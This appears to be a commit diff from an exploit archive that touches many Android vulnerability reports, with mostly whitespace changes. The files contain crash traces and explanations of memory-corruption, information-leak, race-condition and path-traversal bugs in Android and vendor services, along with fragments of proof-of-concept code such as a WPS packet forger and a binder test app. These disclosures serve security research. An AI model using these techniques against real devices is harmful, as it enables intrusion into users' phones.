I/DEBUG ( 3021): backtrace:
I/DEBUG ( 3021): #00 pc 0000000000079b24 /system/lib64/libc.so (je_free+92)
I/DEBUG ( 3021): #01 pc 0000000000019910 /system/lib64/libc.so (free+20)

2
exploits/android/dos/39425.txt
View file

@ -18,7 +18,7 @@ I/DEBUG ( 3021): x20 0000000000000000 x21 0000007f7c1036a0 x22 000000
I/DEBUG ( 3021): x24 0000000032d231a0 x25 0000000000000065 x26 0000000032d28880 x27 0000000000000065
I/DEBUG ( 3021): x28 0000000000000000 x29 0000007f817fecb0 x30 0000007f740be014
I/DEBUG ( 3021): sp 0000007f817fecb0 pc 0000007f740cefdc pstate 0000000080000000
I/DEBUG ( 3021):
I/DEBUG ( 3021):
I/DEBUG ( 3021): backtrace:
I/DEBUG ( 3021): #00 pc 0000000000065fdc /system/lib64/libfacerecognition.so (MdConvertLine+28)
I/DEBUG ( 3021): #01 pc 0000000000055010 /system/lib64/libfacerecognition.so (MCC_Process+160)

2
exploits/android/dos/39629.txt
View file

@ -119,7 +119,7 @@ See
[ 56.945022]-(0)[880:tx_thread]ffa0: 00000000 cb99ffb0 c000e618 c008fa2c 00000000 00000000 00000000 00000000
[ 56.946236]-(0)[880:tx_thread]ffc0: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 56.947452]-(0)[880:tx_thread]ffe0: 00000000 00000000 00000000 00000000 00000013 00000000 ffffffff ffffffff
[ 56.948658]Backtrace:
[ 56.948658]Backtrace:
[ 56.948966]-(0)[880:tx_thread][<c0408a1c>] (kalDevPortWrite+0x0/0x484) from [<c03db164>] (nicTxCmd+0x354/0x638)
[ 56.950213] r9:00000000 r8:dd5d0000 r7:00000110 r6:e54b5d10 r5:e54af000
r4:e54b6168

8
exploits/android/dos/39651.txt
View file

@ -17,7 +17,7 @@ The file crashes with the following stack trace in M:
09-08 15:51:01.322 198 198 F DEBUG : r4 000000c5 r5 0000000a r6 00000000 r7 00000005
09-08 15:51:01.322 198 198 F DEBUG : r8 b3098400 r9 b21cabf8 sl 00000001 fp 00000220
09-08 15:51:01.322 198 198 F DEBUG : ip b3099bbc sp ad7876a0 lr b1c38ab7 pc 00000000 cpsr 200d0010
09-08 15:51:01.329 198 198 F DEBUG :
09-08 15:51:01.329 198 198 F DEBUG :
09-08 15:51:01.329 198 198 F DEBUG : backtrace:
09-08 15:51:01.329 198 198 F DEBUG : #00 pc 00000000 <unknown>
09-08 15:51:01.329 198 198 F DEBUG : #01 pc 00018ab5 /system/lib/libstagefright_soft_avcdec.so (ih264d_process_intra_mb+2544)
@ -25,7 +25,7 @@ The file crashes with the following stack trace in M:
09-08 15:51:01.329 198 198 F DEBUG : #03 pc 0000e0b9 /system/lib/libstagefright_soft_avcdec.so (ih264d_recon_deblk_thread+64)
09-08 15:51:01.329 198 198 F DEBUG : #04 pc 0003f3e7 /system/lib/libc.so (__pthread_start(void*)+30)
09-08 15:51:01.329 198 198 F DEBUG : #05 pc 00019b43 /system/lib/libc.so (__start_thread+6)
09-08 15:51:01.627 198 198 F DEBUG :
09-08 15:51:01.627 198 198 F DEBUG :
09-08 15:51:01.627 198 198 F DEBUG : Tombstone written to: /data/tombstones/tombstone_02
It crashes with the following trace in L:
@ -42,11 +42,11 @@ I/DEBUG ( 6837): r0 0000000f r1 ffffffff r2 af2e286c r3 00000007
I/DEBUG ( 6837): r4 af2e286c r5 00000010 r6 00000000 r7 00000000
I/DEBUG ( 6837): r8 0d452c00 r9 af2fc9c8 sl a36c81f7 fp 1e1a8a58
I/DEBUG ( 6837): ip ffffffff sp af2e2840 lr 0000000f pc af2ea8f0 cpsr 800c0010
I/DEBUG ( 6837):
I/DEBUG ( 6837):
I/DEBUG ( 6837): backtrace:
I/DEBUG ( 6837): #00 pc 000078f0 /system/lib/libstagefright_soft_h264dec.so
I/DEBUG ( 6837): #01 pc 0000000d <unknown>
I/DEBUG ( 6837):
I/DEBUG ( 6837):
I/DEBUG ( 6837): Tombstone written to: /data/tombstones/tombstone_09
To reproduce the issue, download the attached file, and wait for it to be thumbnailed. This can be triggered by opening the downloads folder in the Photos application.

4
exploits/android/dos/39685.txt
View file

@ -25,9 +25,9 @@ if ((code == GET_PARAMETER || code == GET_CONFIG) && err == OK) {
reply->write(params, size); <- Write back entire buffer to caller
}
The vulnerability stems from the fact that Parcel::read(void* outData, size_t len) fails quickly if it doesnt have sufficient data in the parcel to satisfy the request leaving the outData buffer untouched. As long as the call to getParameter or getConfig succeed then the entire, mostly uninitialized buffer will be returned. For example if the parameter is only 8 bytes in size but the caller passes a size field of 128 bytes (but doesnt write those 128 bytes into the parcel) then the 120 bytes following in the heap will be returned uninitialized.
The vulnerability stems from the fact that Parcel::read(void* outData, size_t len) fails quickly if it doesnt have sufficient data in the parcel to satisfy the request leaving the outData buffer untouched. As long as the call to getParameter or getConfig succeed then the entire, mostly uninitialized buffer will be returned. For example if the parameter is only 8 bytes in size but the caller passes a size field of 128 bytes (but doesnt write those 128 bytes into the parcel) then the 120 bytes following in the heap will be returned uninitialized.
Arguably theres also a potential NULL pointer dereference here depending on the implementation as the call to malloc can fail with an arbitrary size value. But I think later functions handle the NULL case.
Arguably theres also a potential NULL pointer dereference here depending on the implementation as the call to malloc can fail with an arbitrary size value. But I think later functions handle the NULL case.
Id suggest that the result of data.read should be checked to ensure all the data has been read correctly.
Proof of Concept:

6
exploits/android/dos/39686.txt
View file

@ -48,7 +48,7 @@ sp<IMemoryHeap> BpMemory::getMemory(ssize_t* offset, size_t* size) const
return mHeap;
}
Nope, as we can see, no check is made of IMemoryHeaps size, so you could specify a mapped file smaller than offset and create a pointer out of bounds. Of course if IMemoryHeap is invalid then the mmap process will return MAP_FAILED which will end up as NULL after the call to pointer().
Nope, as we can see, no check is made of IMemoryHeaps size, so you could specify a mapped file smaller than offset and create a pointer out of bounds. Of course if IMemoryHeap is invalid then the mmap process will return MAP_FAILED which will end up as NULL after the call to pointer().
So how can this be abused? Any IPC service which calls pointer() can be tricked into accessing an arbitrary location, either a relative offset to the file mapped or NULL. For example look at ICrypto::onTransact with the DECRYPT operation. It checks that the offset is within the total size (this has been exploited before) with:
@ -57,7 +57,7 @@ So how can this be abused? Any IPC service which calls pointer() can be tricked
} else if ((size_t)offset > sharedBuffer->size() - totalSize) {
result = -EINVAL;
The size is the value returned through IMemory, and not the actual mapped size from IMemoryHeap so in this case offset can be arbitrary. With the right plugin (such as the clearkey plugin) we can get this to read arbitrary memory. Even more so as theres no NULL checking in pointer() we can cause IMemoryHeap to fail which causes pointer() to return NULL. Setting size to 0xFFFFFFFF means we can read any memory location from 0 to 0xFFFFFFFF.
The size is the value returned through IMemory, and not the actual mapped size from IMemoryHeap so in this case offset can be arbitrary. With the right plugin (such as the clearkey plugin) we can get this to read arbitrary memory. Even more so as theres no NULL checking in pointer() we can cause IMemoryHeap to fail which causes pointer() to return NULL. Setting size to 0xFFFFFFFF means we can read any memory location from 0 to 0xFFFFFFFF.
This can be turned into an arbitrary write as long as you can pass an arbitrary IMemory to another service. For example the BnCameraRecordingProxy::onTransact in frameworks/av/camera/ICameraRecordingProxy.cpp does the following for onReleaseRecordingFrame
@ -79,7 +79,7 @@ case RELEASE_RECORDING_FRAME: {
return NO_ERROR;
} break;
As you can coerce the pointer value, as long as the first 4 bytes make the integer 3 the next 4 bytes will be overwritten by the native handle value which can be controlled.
As you can coerce the pointer value, as long as the first 4 bytes make the integer 3 the next 4 bytes will be overwritten by the native handle value which can be controlled.
Proof of Concept:
Ive provided a PoC which exploits the issue in ICrypto::decrypt. I will just SIG_SEGV on reading an arbitrary location (in this case 1GiB relative to the mapped memory). If it succeeds then thats good as well as it shouldn't succeed. You should be able to create default Android Studio project and replace the MainActivity with the provided Java file. When run it should cause media server to crash.

36
exploits/android/dos/39801.c
View file

@ -24,7 +24,7 @@
Total Wps Length: 118
[99] SSID: DON'T_CONNECT
DEST: ff ff ff ff ff ff
DEST: ff ff ff ff ff ff
Sending Packet (315 byte) ...
...
@ -108,8 +108,8 @@
#define CONFIG_METHODS 0x1008
/* Just cloned from a sniffed packet */
#define RATES_v "\x82\x84\x8b\x96"
#define ESRATES_v "\x8c\x12\x98\x24\xb0\x48\x60\x6c"
#define RATES_v "\x82\x84\x8b\x96"
#define ESRATES_v "\x8c\x12\x98\x24\xb0\x48\x60\x6c"
/* Wps Version */
#define WV 0x10
@ -177,7 +177,7 @@ typedef struct wtag_16 {
typedef struct wtag_point {
def init;
char *item;
char *item;
} __attribute__((packed)) wtag_c;
@ -298,7 +298,7 @@ struct WPSProbeRespIe {
/* Serial Number */
wtag_c serial;
/* Primary_device_type */
wtag_c dev_type;
wtag_c dev_type;
/* Device Name */
wtag_c dname;
/* Config Methods */
@ -373,7 +373,7 @@ wtoa( char *pop, struct WPSProbeRespIe *tag )
pop[i++] = *(a+p++);
}
#ifdef DEBUG
printf("Total Wps Length: %d\n", i);
printf("Total Wps Length: %d\n", i);
#endif
/* wps->head.tl */
@ -549,16 +549,16 @@ create_wifi(char *pop)
tag->ht_info.subset2 = 0x0001;
tag->ht_info.scheme[0] = 0x0f;
memcpy( pop, radiotap_hdr, sizeof(radiotap_hdr) );
memcpy( pop, radiotap_hdr, sizeof(radiotap_hdr) );
memcpy( &pop[len+=sizeof(radiotap_hdr)], \
(u8 *)ie, sizeof(struct ie80211_hdr) );
(u8 *)ie, sizeof(struct ie80211_hdr) );
memcpy( &pop[len+=sizeof(struct ie80211_hdr)], \
fixed_hdr, sizeof(fixed_hdr) );
memcpy( &pop[len+=sizeof(fixed_hdr)], \
(u8 *)&ssid->head, 2 );
memcpy( &pop[len+=2], ssid->ssid, i );
(u8 *)&ssid->head, 2 );
memcpy( &pop[len+=2], ssid->ssid, i );
memcpy( &pop[len+=i], (u8 *) tag, \
sizeof(struct Wifi_Tags) );
sizeof(struct Wifi_Tags) );
len+=sizeof(struct Wifi_Tags);
free( ssid );
@ -596,11 +596,11 @@ broadcast(char *packet, int len)
sll.sll_ifindex = ifr.ifr_ifindex;
if( ioctl( sock, SIOCGIFHWADDR, &ifr ) < 0 )
{
{
perror( "ioctl(SIOCGIFHWADDR) failed" );
close(sock);
exit(EXIT_FAILURE);
}
}
memset( &iwr, 0, sizeof( struct iwreq ) );
strncpy( iwr.ifr_name, IFACE, IFNAMSIZ );
@ -628,12 +628,12 @@ broadcast(char *packet, int len)
#ifdef SHOW
int i;
printf("\n\033[34m [\033[31m%d\033[34m] \033[33m", count);
printf("\tSSID: %s\n", SSID);
printf("\tDEST: ");
printf("\tSSID: %s\n", SSID);
printf("\tDEST: ");
for(i=0;i<6;i++)
printf("%02x ", DESTINATION_MAC[i]&0xff);
printf("\n\tSending Packet (%d byte) ...\033[0m\n", len);
#endif
printf("%02x ", DESTINATION_MAC[i]&0xff);
printf("\n\tSending Packet (%d byte) ...\033[0m\n", len);
#endif
ret = write( sock, packet, len );
if( ret < 0 ){
perror("write() failed");

12
exploits/android/dos/39921.txt
View file

@ -2,8 +2,8 @@ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=798
Android: Stack-buffer-overflow in /system/bin/sdcard
There's an integer overflow issue in get_node_path_locked, which results in
a buffer overflow. For all of the calling paths, this is going to overflow a
There's an integer overflow issue in get_node_path_locked, which results in
a buffer overflow. For all of the calling paths, this is going to overflow a
stack buffer in the parent function:
static ssize_t get_node_path_locked(struct node* node, char* buf, size_t bufsize) {
@ -41,13 +41,13 @@ static ssize_t get_node_path_locked(struct node* node, char* buf, size_t bufsize
This can be triggered by a malicious app creating a directory structure in
/sdcard with a total path length longer than PATH_MAX, which can be achieved by
creating a directory heirarchy starting with several directories with short
creating a directory heirarchy starting with several directories with short
names and later renaming these parent directories to have longer names. See the
attached POC, which can be run from the 'untrusted_app' selinux domain.
It appears that the overflow is close enough to the bottom of the stack that
with a large overflow we can corrupt thread data that is used before the stack
cookie is checked, suggesting that this issue is possibly exploitable despite
It appears that the overflow is close enough to the bottom of the stack that
with a large overflow we can corrupt thread data that is used before the stack
cookie is checked, suggesting that this issue is possibly exploitable despite
the presence of stack cookies.
(gdb) i r

6
exploits/android/dos/40381.txt
View file

@ -80,13 +80,13 @@ index 7fa9a39..0600eb1 100644
#include <stdlib.h>
#include <string.h>
+#include <unistd.h>
#include <private/android_filesystem_config.h>
@@ -204,6 +205,9 @@ int do_add_service(struct binder_state *bs,
if (!handle || (len == 0) || (len > 127))
return -1;
+ if (uid > 1000)
+ sleep(2);
+

4
exploits/android/dos/40449.txt
View file

@ -24,11 +24,11 @@ Its logcat output looks like this:
01-15 05:20:54.530 19158-19158/com.google.jannh.pointerleak E/leaker: == service "permission" ==
type: BINDER_TYPE_BINDER
object: 0x000000712967e260
== service "package" ==
type: BINDER_TYPE_BINDER
object: 0x000000712963cfc0
== service "clipboard" ==
type: BINDER_TYPE_BINDER
object: 0x00000071367bfd80

6
exploits/android/dos/40515.txt
View file

@ -10,7 +10,7 @@ See attached PoC, which leaks the addresses of allocated heap objects in system_
Output running from the shell (run on droidfood userdebug build, MTC19X):
shell@bullhead:/ $ /data/local/tmp/binder_info_leak
shell@bullhead:/ $ /data/local/tmp/binder_info_leak
--- binder info leak ---
[0] opening /dev/binder
[0] looking up activity
@ -53,7 +53,7 @@ pwndbg> hexdump 0x0000007f8b9d19c0
+0010 0x7f8b9d19d0 65 00 6e 00 74 00 5f 00 40 d1 0c a8 7f 00 00 00 |e.n.|t._.|@...|....|
+0020 0x7f8b9d19e0 6a 16 20 00 00 00 00 00 20 ad 81 ab 7f 00 00 00 |j...|....|....|....|
+0030 0x7f8b9d19f0 e0 fc 7f 8e 7f 00 00 00 a0 f2 c7 8a 7f 00 00 00 |....|....|....|....|
+0040 0x7f8b9d1a00
+0040 0x7f8b9d1a00
This is pretty obviously the case; the code in Parcel.cpp that flattens binder objects
to pass via binder transactions:
@ -137,7 +137,7 @@ contains the second pointer.
ref->debug_id, ref->desc);
} break;
In the case of 64-bit processes, we also leak the high dword of the fp->binder pointer, because
In the case of 64-bit processes, we also leak the high dword of the fp->binder pointer, because
a uint32_t is smaller than a binder_uintptr_t.

4
exploits/android/dos/40913.java
View file

@ -3,7 +3,7 @@ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=935
As a part of the KNOX extensions available on Samsung devices, Samsung provides a new service which allows the generation of OTP tokens.
The tokens themselves are generated in a TrustZone application within the TEE (UID: fffffffff0000000000000000000001e). However, in order to allow easy communication between the Non-secure World (NWD) and the Secure-World (SW) trustlet, a new server has been created. This server, called "otp_server", publishes a binder service called "OTP".
The tokens themselves are generated in a TrustZone application within the TEE (UID: fffffffff0000000000000000000001e). However, in order to allow easy communication between the Non-secure World (NWD) and the Secure-World (SW) trustlet, a new server has been created. This server, called "otp_server", publishes a binder service called "OTP".
The service provides a single command via binder (command code 2), which allows a client to provide a buffer from the NWD to be sent to the SW. The requests are serialized to the parcel as a 32-bit length field, followed by the actual request data.
@ -27,7 +27,7 @@ public class MainActivity extends AppCompatActivity {
/**
* The logtag used.
*/
*/
private static final String LOGTAG = "OTP_TEST";
/**

4
exploits/android/dos/40914.java
View file

@ -29,7 +29,7 @@ public class OneWhoKNOX extends AppCompatActivity {
/**
* The logtag used.
*/
*/
private static final String LOGTAG = "OTP_TEST";
/**
@ -46,7 +46,7 @@ public class OneWhoKNOX extends AppCompatActivity {
//Getting the binder
Class smClass = Class.forName("android.os.ServiceManager");
IBinder binder = (IBinder) smClass.getMethod("getService", String.class).invoke(null, INTERFACE_DESCRIPTOR);
//Writing a command with a large length field
Parcel parcel = Parcel.obtain();
Parcel reply = Parcel.obtain();

2
exploits/android/dos/40945.txt
View file

@ -95,7 +95,7 @@ LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
...
0x709efaad94L <pthread_getspecific+56> mov x0, xzr
0x709efaad98L <pthread_getspecific+60> str xzr, [x8]
0x709efaad9cL <pthread_getspecific+64> ret
0x709efaad9cL <pthread_getspecific+64> ret
0x709efaada0L <pthread_getspecific+68> add x10, x10, x8, lsl #4
0x709efaada4L <pthread_getspecific+72> add x8, x10, #0xe8

16
exploits/android/dos/40993.txt
View file

@ -4,7 +4,7 @@ The MAX86902 sensor has a driver that exposes several interfaces through which t
Some of these entries are writable, allowing different values to be configured. Three such files are exposed under the paths:
/sys/devices/virtual/sensors/hrm_sensor/eol_test_result
/sys/devices/virtual/sensors/hrm_sensor/eol_test_result
/sys/devices/virtual/sensors/hrm_sensor/lib_ver
/sys/devices/virtual/sensors/uv_sensor/uv_lib_ver
@ -18,7 +18,7 @@ The sysfs write handlers for these files all share approximately the same logic.
6. buf_len = (unsigned int)strlen(buf) + 1;
7. if (buf_len > MAX_LIB_VER)
8. buf_len = MAX_LIB_VER;
9.
9.
10. if (data->uv_lib_ver != NULL)
11. kfree(data->uv_lib_ver);
12.
@ -36,7 +36,7 @@ Since the code above does not use any mechanism to prevent concurrent access, it
For example, one such race condition could occur when two attempts to call "write" are executed at the same time, where the underlying buffers have different lengths. More concretely, denote the two accessing tasks "task1" and "task2", correspondingly. Consider the following sequence of events:
-"task1" attempts to write to the entry, and provides a buffer of length 20.
-"task1" attempts to write to the entry, and provides a buffer of length 20.
-"task1" manages to execute lines 1-17 (inclusive)
-"task2" now attempts to write to the entry, and provides a buffer of length 2.
-"task2" manages to execute lines 1-13 (inclusive)
@ -50,11 +50,11 @@ The sysfs entries mentioned above have UID "system" and GID "radio". The SELinux
According to the default SELinux rules as present on the SM-G935F (version XXS1APG3), the following contexts may access these files:
allow radio sysfs_sensor_writable : file { ioctl read write getattr lock append open } ;
allow factory_adsp sysfs_sensor_writable : file { ioctl read write getattr lock append open } ;
allow sensorhubservice sysfs_sensor_writable : file { write append open } ;
allow sysfs_sensor_writable sysfs_sensor_writable : filesystem associate ;
allow system_app sysfs_sensor_writable : file { ioctl read write getattr lock append open } ;
allow radio sysfs_sensor_writable : file { ioctl read write getattr lock append open } ;
allow factory_adsp sysfs_sensor_writable : file { ioctl read write getattr lock append open } ;
allow sensorhubservice sysfs_sensor_writable : file { write append open } ;
allow sysfs_sensor_writable sysfs_sensor_writable : filesystem associate ;
allow system_app sysfs_sensor_writable : file { ioctl read write getattr lock append open } ;
Proof of Concept:

48
exploits/android/dos/41161.txt
View file

@ -39,30 +39,30 @@ I've statically verified this issue on an SM-G935F device. The open-source kerne
The sysfs entries mentioned above are world-readable and have an SELinux context of: "u:object_r:debugfs:s0". According to the default SELinux rules as present on the SM-G935F (version XXS1APG3), the following contexts may access these files:
allow ipm debugfs : file { ioctl read getattr lock open } ;
allow RIDL debugfs : file read ;
allow secure_storage debugfs : dir { ioctl read getattr search open } ;
allow knox_system_app debugfs : dir { ioctl read getattr search open } ;
allow debuggerd debugfs : file { ioctl read getattr lock open } ;
allow trusteddomain debugfs : file { read getattr } ;
allow bluetooth debugfs : file read ;
allow knox_system_app debugfs : file { ioctl read getattr lock open } ;
allow system_app debugfs : file { ioctl read getattr lock open } ;
allow slogmodem debugfs : file read ;
allow slogd debugfs : file { ioctl read getattr lock open } ;
allow debugfs debugfs : filesystem associate ;
allow domain debugfs : file { write append open } ;
allow mediaserver debugfs : file { ioctl read write create getattr setattr lock append unlink rename open } ;
allow debuggerd debugfs : dir { ioctl read getattr search open } ;
allow domain debugfs : dir { ioctl read getattr search open } ;
allow cmd_services debugfs : file read ;
allow dumpstate debugfs : file { ioctl read write getattr lock append open } ;
allow secure_storage debugfs : file { ioctl read getattr lock open } ;
allow wcnd debugfs : file read ;
allow init debugfs : file getattr ;
allow system_server debugfs : file { ioctl read getattr lock open } ;
allow untrusteddomain debugfs : file execute ;
allow shell debugfs : file { ioctl read getattr lock open } ;
allow ipm debugfs : file { ioctl read getattr lock open } ;
allow RIDL debugfs : file read ;
allow secure_storage debugfs : dir { ioctl read getattr search open } ;
allow knox_system_app debugfs : dir { ioctl read getattr search open } ;
allow debuggerd debugfs : file { ioctl read getattr lock open } ;
allow trusteddomain debugfs : file { read getattr } ;
allow bluetooth debugfs : file read ;
allow knox_system_app debugfs : file { ioctl read getattr lock open } ;
allow system_app debugfs : file { ioctl read getattr lock open } ;
allow slogmodem debugfs : file read ;
allow slogd debugfs : file { ioctl read getattr lock open } ;
allow debugfs debugfs : filesystem associate ;
allow domain debugfs : file { write append open } ;
allow mediaserver debugfs : file { ioctl read write create getattr setattr lock append unlink rename open } ;
allow debuggerd debugfs : dir { ioctl read getattr search open } ;
allow domain debugfs : dir { ioctl read getattr search open } ;
allow cmd_services debugfs : file read ;
allow dumpstate debugfs : file { ioctl read write getattr lock append open } ;
allow secure_storage debugfs : file { ioctl read getattr lock open } ;
allow wcnd debugfs : file read ;
allow init debugfs : file getattr ;
allow system_server debugfs : file { ioctl read getattr lock open } ;
allow untrusteddomain debugfs : file execute ;
allow shell debugfs : file { ioctl read getattr lock open } ;
allow surfaceflinger debugfs : file { ioctl read getattr lock open } ;

12
exploits/android/dos/41351.txt
View file

@ -1,16 +1,16 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=986
The lgdrmserver binder service (/system/bin/lgdrmserver) implements a handle
system to store pointers to objects allocated by the drm implementation
system to store pointers to objects allocated by the drm implementation
(/system/lib/liblgdrm.so).
In several places, these handles are retrieved from a received binder Parcel, looked up in a SortedVector under a global lock, the lock is
then released and the handle is passed to one of the DRM_xyz functions in
then released and the handle is passed to one of the DRM_xyz functions in
liblgdrm.so which then uses the handle without holding any locks.
The attached PoC simply creates a number of process instances using the function
DRM_ProcessInit (lgdrm binder ordinal 2), then triggers the race condition by
trying to cause a double free on one of these instances using DRM_ProcessEnd
trying to cause a double free on one of these instances using DRM_ProcessEnd
(lgdrm binder ordinal 8). The race window looks something like the following:
ILGDrmService::ProcessEnd(void* handle) {
@ -25,11 +25,11 @@ ILGDrmService::ProcessEnd(void* handle) {
unlock(gLock);
}
This will result in heap corruption during the second call to DRM_ProcessEnd
with the (now invalid) process object, which will eventually crash the
This will result in heap corruption during the second call to DRM_ProcessEnd
with the (now invalid) process object, which will eventually crash the
lgdrmserver process (usually during a subsequent call to malloc).
Several other functions in lgdrmserver follow a similar pattern, and require
Several other functions in lgdrmserver follow a similar pattern, and require
additional locking to be safe.
The PoC has been tested on an LG G4 running build-id MRA58K

4
exploits/android/dos/41352.txt
View file

@ -1,11 +1,11 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=987
The lghashstorageserver binder service (/system/bin/lghashstorageserver)
The lghashstorageserver binder service (/system/bin/lghashstorageserver)
implementation on the LG G4 is vulnerable to path traversal, allowing an
app to read and write 0x20 bytes from any file in the context of the
lghashstorageserver.
See attached for a PoC which reads from /proc/self/attr/current for the
See attached for a PoC which reads from /proc/self/attr/current for the
lghashstorageserver.
[0] opening /dev/binder

14
exploits/android/dos/41353.txt
View file

@ -1,7 +1,7 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=990
The following function (and variations on the same code) is used to write to
files from kernel code in various touchscreen drivers. This copy is from
The following function (and variations on the same code) is used to write to
files from kernel code in various touchscreen drivers. This copy is from
RefCode_CustomerImplementation.c - I'm unsure which copy is actually being used
on the LG G4, but I can trigger the vulnerability. A function with the same
issues exists as "write_file" in several files.
@ -80,14 +80,14 @@ int write_log(char *filename, char *data)
return _write_log(filename, data);
}
This code is setting KERNEL_DS, and there is a code-path in which it does not
This code is setting KERNEL_DS, and there is a code-path in which it does not
restore USER_DS before returning (when mfts_mode is outside the range [0, 3] and
the filename argument is NULL). This can be triggered by first writing to the
sysfs node /sys/devices/virtual/input/lge_touch/mfts and then reading from the
the filename argument is NULL). This can be triggered by first writing to the
sysfs node /sys/devices/virtual/input/lge_touch/mfts and then reading from the
sysfs node /sys/devices/virtual/input/lge_touch/sd. (root needed to write to mfts node).
Once the kernel has returned control to userland with KERNEL_DS set, userland can simply read/write from arbitrary kernel addresses. See
attached for a working exploit for the LG G4, which when run as root will
Once the kernel has returned control to userland with KERNEL_DS set, userland can simply read/write from arbitrary kernel addresses. See
attached for a working exploit for the LG G4, which when run as root will
disable selinux enforcement.

2
exploits/android/dos/41354.txt
View file

@ -73,7 +73,7 @@ Here is a sample crash from a successful execution of the PoC:
11-22 11:51:58.576 28893 28893 F DEBUG : r12 00000000000001d0 r13 00007ffedf71470c r14 00007ffef7482000 r15 0000000000000000
11-22 11:51:58.576 28893 28893 F DEBUG : cs 0000000000000033 ss 000000000000002b
11-22 11:51:58.576 28893 28893 F DEBUG : rip 00007ffef423ed31 rbp 00007ffeea5b3dc0 rsp 00007ffedf7144d0 eflags 0000000000000283
11-22 11:51:58.577 28893 28893 F DEBUG :
11-22 11:51:58.577 28893 28893 F DEBUG :
11-22 11:51:58.577 28893 28893 F DEBUG : backtrace:
11-22 11:51:58.577 28893 28893 F DEBUG : #00 pc 000000000001cd31 /system/lib64/libc.so (memcpy+33)
11-22 11:51:58.577 28893 28893 F DEBUG : #01 pc 0000000000925e1f /dev/ashmem/dalvik-main space (deleted) (offset 0x1000)

6
exploits/android/dos/41355.txt
View file

@ -13,13 +13,13 @@ To illustrate this, here is a snippet from the native function called when a Mem
5. jniThrowException(env, "java/io/IOException", "bad file descriptor");
6. return -1;
7. }
8.
8.
9. int ashmemSize = ashmem_get_size_region(fd);
10. if (ashmemSize <= 0) {
11. jniThrowException(env, "java/io/IOException", "bad ashmem size");
12. return -1;
13. }
14.
14.
15. int protMode = (owner || writable) ? (PROT_READ | PROT_WRITE) : PROT_READ;
16. void* ashmemAddr = mmap(NULL, ashmemSize, protMode, MAP_SHARED, fd, 0);
17. ...
@ -76,7 +76,7 @@ Here is a sample crash from a successful execution of the PoC:
11-22 14:38:43.152 10816 10816 F DEBUG : r12 00007ffeea5b8598 r13 00007ffedbb30a18 r14 00007ffef66fe610 r15 00007ffedef974a0
11-22 14:38:43.152 10816 10816 F DEBUG : cs 0000000000000033 ss 000000000000002b
11-22 14:38:43.152 10816 10816 F DEBUG : rip 00007ffee88efe87 rbp 00007ffed7ad1760 rsp 00007ffed7ad16d0 eflags 0000000000000202
11-22 14:38:43.156 10816 10816 F DEBUG :
11-22 14:38:43.156 10816 10816 F DEBUG :
11-22 14:38:43.156 10816 10816 F DEBUG : backtrace:
11-22 14:38:43.157 10816 10816 F DEBUG : #00 pc 0000000000001e87 /system/lib64/libOpenglSystemCommon.so (_ZN14HostConnection10gl2EncoderEv+7)
11-22 14:38:43.157 10816 10816 F DEBUG : #01 pc 0000000000008434 /system/lib64/egl/libGLESv2_emulation.so (glCreateProgram+36)

2
exploits/android/dos/41981.txt
View file

@ -7,7 +7,7 @@ mkvparser::VideoTrack::VideoTrack(mkvparser::Segment*, mkvparser::Track::Info co
During EBML node parsing the EBML element_size is used unvalidated to allocate a
stack buffer to store the element contents. Since calls to alloca simply compile
to a subtraction from the current stack pointer, for large sizes this can result
in memory corruption and potential remote-code-execution in the mediaserver
in memory corruption and potential remote-code-execution in the mediaserver
process.
Tested on an LG-G4 with the latest firmware available for my device; MRA58K.

2
exploits/android/dos/41983.txt
View file

@ -6,7 +6,7 @@ All offsets correspond to the version of the library I have, with md5sum 6708b7a
Attached are crashers for the testcases which repeatedly cause the parsing of the files by the mediaserver process (via binder ipc), which will eventually cause the mediaserver to crash when the corrupted data is used.
1) (000035.mkv) Writing outside the bounds of a new[0] allocation.
1) (000035.mkv) Writing outside the bounds of a new[0] allocation.
In mkvparser::Block::Block, there is a call to new[] (0xfd44) with an attacker controlled count. By setting this count to 0, this will be passed by _Znaj/_Znwj as a call to malloc(1). In jemalloc, this will result in a minimum-sized allocation of 8 bytes.

2
exploits/android/dos/42135.c
View file

@ -11,7 +11,7 @@ void fuzz(void * param){
while(1){
addr.sin_family = 0;//rand()%42;
printf("sin_family1 = %08lx\n", addr.sin_family);
connect(sockfd, (struct sockaddr *)&addr, 16);
connect(sockfd, (struct sockaddr *)&addr, 16);
}
}
int main(int argc, char **argv)

14
exploits/android/dos/42169.txt
View file

@ -1,30 +1,30 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1221
Similar to the previously reported issue 1206 , when parsing AVI files the
Similar to the previously reported issue 1206 , when parsing AVI files the
CAVIFileParser object contains a fixed-size array of (what appears to be)
pointer/length pairs, used (I suppose) to store the data for each stream.
This is a fixed size, with 40 entries. However, it is never verified that the
number of streams in the file is less than this number; and when freeing the
number of streams in the file is less than this number; and when freeing the
CAVIFileParser object, we will iterate through this array past the end of the
object, freeing each non-NULL pointer entry.
This presents initially as a free of an uninitialised pointer, since there is
a correctly aligned field inside the CAVIFileParser object that does not appear
to be used at all; careful heap grooming can turn this into a free of an
to be used at all; careful heap grooming can turn this into a free of an
attacker controlled value. It can also however be used to traverse outside the
object by ensuring that this uninitialised value is a NULL pointer, and instead
object by ensuring that this uninitialised value is a NULL pointer, and instead
free pointers from the object following the CAVIFileParser object, resulting in
a use-after-free.
The attached sample file (and generation script) triggers the latter case, and
The attached sample file (and generation script) triggers the latter case, and
will usually crash attempting to free an invalid pointer from outside the bounds
of the CAVIFileParser object.
The two quirks of the attached sample file necessary to reach this vulnerability
are that the number of streams in the avi are larger than 40 and that the file
is truncated before the strl LIST objects are completed, to avoid triggering a
NULL-pointer dereference attempting to retrieve the movi information for the
is truncated before the strl LIST objects are completed, to avoid triggering a
NULL-pointer dereference attempting to retrieve the movi information for the
file.
Build fingerprint: 'lge/p1_global_com/p1:6.0/MRA58K/1624210305d45:user/release-keys'

22
exploits/android/dos/42170.txt
View file

@ -2,10 +2,10 @@ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1206
Missing bounds-checking in AVI stream parsing
When parsing AVI files, CAVIFileParser uses the stream count from the AVI header
to allocate backing storage for storing metadata about the streams (member
variable m_aStream). However, the number of stream headers we parse is never
validated against this allocation size during parsing, so we can write further
